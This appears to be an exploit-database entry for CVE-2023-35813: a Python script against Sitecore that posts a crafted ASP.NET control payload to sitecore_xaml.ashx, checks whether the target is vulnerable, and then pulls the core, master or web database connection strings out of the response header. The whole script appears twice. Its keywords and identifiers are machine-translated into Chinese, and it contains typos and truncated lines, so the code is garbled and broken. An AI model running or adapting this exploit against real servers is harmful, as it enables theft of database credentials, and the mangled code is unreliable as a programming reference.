#!/usr/bin/env Python3
#
#利用标题: SITECORE-远程代码执行v8.2
#利用作者: Abhishek Morla
#Google Dork: N/A
#日期: 2024-01-08
#供应商homepage3360 https://www.sitecore.com/
#软件link: https://dev.sitecore.net/
#版本: 10.3
#测试在: Windows64bit/mozila firefox
#CVE : CVE-2023-35813
#漏洞将所有体验平台拓扑(XM,XP,XC)从9.0发行到10.3初始版本; 8.2也受到影响
#博客: https://medium.com/@abhishekmorla/u...sinnection-innection-in-sitecore-5502148fce09
#视频POC :
导入argparse
导入请求
来自urllib.parse导入报价
来自Rich.Console进口控制台
console=console()
def initial_test(主机名):
#初始有效载荷以测试漏洞
test_payload='''
%@登记
tagprefix='x'
namespace='System.Runtime.Remoting.Services'
汇编='System.Runtime.Remoting,版本=4.0.0.0,culture=中性,publicKeyToken=B77A5C561934E089'
%
x:RemotingService runat='server'
context-response-contentType='testVulnerability'
/
'''
encoded_payload=quote(test_payload)
url=f'https://{hostName}/sitecore_xaml.ashx/- /xaml/sitecore.xaml.tutorials.styles.index'
标题={'content-type':'应用程序/x-www-form-urlencoded'}
data='isevent=1__source=参数=parsecontrol(\'{} \')'。格式(encoded_payload)
响应=requests.post(url,headers=标题,data=data,verify=false)
#在响应的内容类型中检查测试字符串
响应中返回'testVulnerabily'
def get_payload(选择):
#不同选项的有效载荷模板
有效载荷={
'1':'%$ connectionstrings:core%',
'2':'%$ connectionstrings:master%',
'3':'%$ connectionstrings:web%'
}
base_payload='''
%@登记
tagprefix='x'
namespace='System.Runtime.Remoting.Services'
汇编='System.Runtime.Remoting,版本=4.0.0.0,culture=中性,publicKeyToken=B77A5C561934E089'
%
x:RemotingService runat='server'
context-response-contenttype='{}'
/
'''
return base_payload.format(pareloads.get(选择,'无效'))
def main(主机名):
如果Initial_test(主机名):
打印(“剥削,请等待.”)
console.print('[[Bold Green]目标似乎很脆弱。继续选择有效载荷选择。[/BOLD GREEN])
打印(“选择有效载荷到使用:')
打印('1:核心连接字符串')
打印('2:主连接字符串')
打印('3: Web连接字符串')
payload_choice=输入('输入您的选择(1、2或3):')
有效载荷=get_payload(payload_choice)
encoded_payload=QUOTE(有效载荷)
url=f'http://{hostName}/sitecore_xaml.ashx/- /xaml/sitecore.xaml.tutorials.styles.index'
标题={'content-type':'应用程序/x-www-form-urlencoded'}
data='isevent=1__source=参数=parsecontrol(\'{} \')'。格式(encoded_payload)
响应=requests.post(url,标头=标题,data=data)
如果响应中的“ content-type”。headers:
打印('来自响应标题的内容类型:')
打印('\ n')
打印(响应。
其他:
打印('响应标头中没有内容类型。状态代码:',wendmes.status_code)
其他:
打印(“目标似乎不容易受到CVE-2023-35813。”)
如果name=='__ -Main __':
console.print('[[Bold Green]作者: Abhishek Morla [/Bold Green])
console.print('[[BOLD RED] CVE-2023-35813 [/BOLD RED]')
parser=argparse.argumentparser(description='sitecore中的CVE-2023-35813漏洞')
parser.add_argument('hostName',type=str,help='target sitecore实例的主机名')
args=parser.parse_args()
main(args.hostname)
#
#利用标题: SITECORE-远程代码执行v8.2
#利用作者: Abhishek Morla
#Google Dork: N/A
#日期: 2024-01-08
#供应商homepage3360 https://www.sitecore.com/
#软件link: https://dev.sitecore.net/
#版本: 10.3
#测试在: Windows64bit/mozila firefox
#CVE : CVE-2023-35813
#漏洞将所有体验平台拓扑(XM,XP,XC)从9.0发行到10.3初始版本; 8.2也受到影响
#博客: https://medium.com/@abhishekmorla/u...sinnection-innection-in-sitecore-5502148fce09
#视频POC :
导入请求
来自urllib.parse导入报价
来自Rich.Console进口控制台
console=console()
def initial_test(主机名):
#初始有效载荷以测试漏洞
test_payload='''
%@登记
tagprefix='x'
namespace='System.Runtime.Remoting.Services'
汇编='System.Runtime.Remoting,版本=4.0.0.0,culture=中性,publicKeyToken=B77A5C561934E089'
%
x:RemotingService runat='server'
context-response-contentType='testVulnerability'
/
'''
encoded_payload=quote(test_payload)
url=f'https://{hostName}/sitecore_xaml.ashx/- /xaml/sitecore.xaml.tutorials.styles.index'
标题={'content-type':'应用程序/x-www-form-urlencoded'}
data='isevent=1__source=参数=parsecontrol(\'{} \')'。格式(encoded_payload)
响应=requests.post(url,headers=标题,data=data,verify=false)
#在响应的内容类型中检查测试字符串
响应中返回'testVulnerabily'
def get_payload(选择):
#不同选项的有效载荷模板
有效载荷={
'1':'%$ connectionstrings:core%',
'2':'%$ connectionstrings:master%',
'3':'%$ connectionstrings:web%'
}
base_payload='''
%@登记
tagprefix='x'
namespace='System.Runtime.Remoting.Services'
汇编='System.Runtime.Remoting,版本=4.0.0.0,culture=中性,publicKeyToken=B77A5C561934E089'
%
x:RemotingService runat='server'
context-response-contenttype='{}'
/
'''
return base_payload.format(pareloads.get(选择,'无效'))
def main(主机名):
如果Initial_test(主机名):
打印(“剥削,请等待.”)
console.print('[[Bold Green]目标似乎很脆弱。继续选择有效载荷选择。[/BOLD GREEN])
打印(“选择有效载荷到使用:')
打印('1:核心连接字符串')
打印('2:主连接字符串')
打印('3: Web连接字符串')
payload_choice=输入('输入您的选择(1、2或3):')
有效载荷=get_payload(payload_choice)
encoded_payload=QUOTE(有效载荷)
url=f'http://{hostName}/sitecore_xaml.ashx/- /xaml/sitecore.xaml.tutorials.styles.index'
标题={'content-type':'应用程序/x-www-form-urlencoded'}
data='isevent=1__source=参数=parsecontrol(\'{} \')'。格式(encoded_payload)
响应=requests.post(url,标头=标题,data=data)
如果响应中的“ content-type”。headers:
打印('来自响应标题的内容类型:')
打印('\ n')
打印(响应。
其他:
打印('响应标头中没有内容类型。状态代码:',wendmes.status_code)
其他:
打印(“目标似乎不容易受到CVE-2023-35813。”)
如果name=='__ -Main __':
console.print('[[Bold Green]作者: Abhishek Morla [/Bold Green])
console.print('[[BOLD RED] CVE-2023-35813 [/BOLD RED]')
parser=argparse.argumentparser(description='sitecore中的CVE-2023-35813漏洞')
parser.add_argument('hostName',type=str,help='target sitecore实例的主机名')
args=parser.parse_args()
main(args.hostname)